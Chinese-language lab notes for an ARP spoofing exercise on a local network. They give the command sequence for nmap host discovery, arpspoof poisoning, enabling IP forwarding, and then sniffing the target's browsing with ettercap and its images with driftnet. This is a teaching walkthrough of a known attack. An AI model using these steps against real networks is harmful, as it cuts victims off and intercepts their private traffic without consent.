实验环境:处于同一局域网下的Kali攻击机和靶机
实验步骤:
arp攻击:
1.查看Kali自身所处的网络
ifconfig
2.用nmap扫描该局域网下的其他用户
namp -sP 172.20.10.7/24
发现有三台设备正处于这一网络下,其中1为所开热点的手机(路由器)、2为靶机、3为kali IP
3.在Kali中使用arpspoof工具实现ARP攻击第一个路由器IP,后一个靶机ip
arpspoof -i eth0 -t 172.20.10.1 172.20.10.2
此时靶机已经断网
arp欺骗:
1.若想实现arp欺骗则需要在实施arp攻击命令之前把/proc/sys/net/ipv4/ip_forward这一路径文件默认内容0改为1
cat /proc/sys/net/ipv4/ip_forward
echo 1 >> /proc/sys/net/ipv4/ip_forward
cat /proc/sys/net/ipv4/ip_forward
2.实施arp攻击:第一个路由器IP,后一个靶机ip
arpspoof -i eth0 -t 172.20.10.1 172.20.10.2
3.此时另建新的终端
ettercap -Tq -i eth0
4.此时可以接收靶机浏览信息、一下空格开始接受、再按一下停止
5.进行图片监控
driftnet -i eth0